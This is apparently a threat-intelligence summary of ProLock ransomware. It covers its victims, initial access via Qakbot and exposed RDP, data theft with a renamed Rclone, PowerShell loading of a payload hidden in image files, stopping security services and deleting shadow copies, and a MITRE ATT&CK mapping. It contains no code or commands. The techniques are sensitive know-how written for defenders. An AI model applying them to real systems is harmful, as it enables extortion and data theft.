ProLock ransomware, previously PwndLocker, was released in March of 2020 with advanced capabilities. This evolved ransomware had begun operating in the latter part of 2019 and was primarily responsible for the attack targeting ATM manufacturer Diebold Nixdorf and the US state of Illinois. It first encrypts files with the RSA-2048 algorithm, modifies filenames, and then creates a ransom message. The ransomware then appends the “.proLock” extension to filenames of all encrypted files.
ProLock ransomware operators gain access to hacked networks via the Qakbot (Qbot) info-stealer botnet, which is in turn capable of spreading across networks. Unprotected RDP servers also facilitate the intrusion.
In the past, ProLock has targeted multiple sectors including construction, finance, healthcare, and legal. The malware was also used in attacks aimed at US government agencies and industrial entities. For exfiltration, ProLock operators use a legitimate computer program – Rclone – command-line tool capable of copying and syncing files to and from different cloud storage providers, such as OneDrive, Google Drive, Mega, etc. The executable is always renamed to resemble legitimate system binaries. The operator’s ransom demands range from $175,000 to more than $660,000 worth of Bitcoins (Fig.1).
Microsoft’s task automation and configuration management framework PowerShell is used to extract the binary from a PNG or a JPG file and inject it into the memory. ProLock kills processes from the embedded list and stops services, including security-related ones like CSFalconService, using the net stop command. Then it utilizes the Vssadmin Windows process to remove volume shadow copies and limit their size, to make sure that no new copies are created (fig.2).
Mitre ATT&CK Mapping
External Remote Services (T1133), Spearphishing Attachment (T1193), Spearphishing Link (T1192)
Powershell (T1086), Scripting (T1064), User Execution (T1204), Windows Management Instrumentation (T1047)